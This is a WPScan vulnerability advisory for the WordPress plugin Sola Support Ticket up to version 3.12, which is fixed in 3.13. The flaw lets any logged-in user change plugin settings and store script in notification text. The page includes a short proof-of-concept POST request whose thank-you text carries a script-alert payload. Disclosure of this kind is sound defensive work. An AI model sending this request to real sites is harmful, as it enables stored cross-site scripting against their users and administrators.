Sola Support Ticket <= 3.12 - XSS & Configuration Change

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Any logged in user with any role and access to wp-admin in any way can update plugin settings including allowing HTML to be parsed. One can also change any notification messages to include JS which then can be used to obtain information by forgery.
Proof of Concept
Make POST request to /wp-admin with parameters

sola_st_save_settings:1
sola_st_settings_allow_html:1
sola_st_settings_thank_you_text:<script>alert(1);</script>

Affects

Plugin sola-support-tickets
fixed in version 3.13

References

URL https://wordpress.org/plugins/sola-support-tickets/changelog/
URL https://plugins.trac.wordpress.org/changeset?old_path=%2Fsola-support-tickets%2Ftags%2F3.12&old=1350554&new_path=%2Fsola-support-tickets%2Ftags%2F3.13&new=1350554&sfp_email=&sfph_mail=

Classification

Type BYPASS

Miscellaneous

Submitter Justin Greer
Submitter Website http://justin-greer.com
Submitter Twitter justingreer2014
Views 51
Verified No
WPVDB ID 8389

Timeline

Publicly Published 2016-01-28 (11 months ago)
Added 2016-02-14 (10 months ago)
Last Updated 2016-02-14 (10 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.